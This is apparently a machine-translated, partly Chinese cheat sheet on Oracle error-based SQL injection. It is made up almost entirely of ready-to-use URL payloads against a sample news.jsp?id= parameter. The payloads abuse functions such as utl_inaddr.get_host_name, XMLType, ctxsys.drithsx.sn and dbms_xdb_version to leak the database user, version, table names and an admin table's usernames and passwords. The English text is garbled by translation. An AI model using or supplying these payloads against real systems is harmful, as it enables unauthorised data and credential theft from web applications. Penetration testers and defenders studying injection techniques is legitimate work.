Oracle error injection summary
0x00 Foreword
Oracle database appeared in the injection time error message , you can select the priority being given the injection , the use of error way query results data out to the wrong page.
Similar use of error injection requires 1 = [error statement] 1> [given statement] using a comparison operator , in such a manner given injection (MYSQL Based only the function can be given), the injection being given mssql similar manner.
Judgment injection
http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from user_tables)>0 --
http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from dual)>0 --
0x01 error injection function
utl_inaddr.get_host_name () for error injection
and 1=utl_inaddr.get_host_name((select user from dual))--
http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select user from dual))--utl_inaddr.get_host_address intention is to obtain ip address, but if you pass a parameter can not be resolved will return an oracle error and display parameters passed.
Our message is the result of a sql statement so the return statement is executed. After starting the oracle, some system variables are placed among some specific view, you can use these views to get something you want. There are usually very important information:
ctxsys.drithsx.sn () for error injection
http://www.jsporcle.com/news.jsp?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --
An XMLType () for error injection
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --
http://www.jsporcle.com/news.jsp?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null --
dbms_xdb_version.checkin () for error injection
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --
查询版本信息
http://www.jsporcle.com/news.jsp?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --
bms_xdb_version.makeversioned () into the injection being given
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --
dbms_xdb_version.uncheckout () for error injection
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --
dbms_utility.sqlid_to_sqlhash () for error injection
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --
ordsys.ord_dicom.getmappingxpath () for error injection
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--
decode进行报错注入
这种方式更偏向布尔型注入,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。
and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --
0x02 报错函数注入数据
Oracle 数据库的注入不同于其他数据库,如Access 和Mysql,它包含了几个系统表,这几个系统表里存储了系统数据库的表名和列名,如user_tab_columns,all_tab_columns,all_tables,user_tables 系统表就存储了用户的所有的表、列名,其中table_name 表示的是系统里的表名,column_name 里的是系统里存在的列名
爆库 第一行记录
http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (SELECT DISTINCT owner FROM all_tables where rownum=1) from dual))--
爆表 第一行第一个记录
http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1)) --
第二个记录
http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SESSION_EVOLVE$'))) --
报错admin表的 用户和密码
http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))--
其他报错函数大同小异。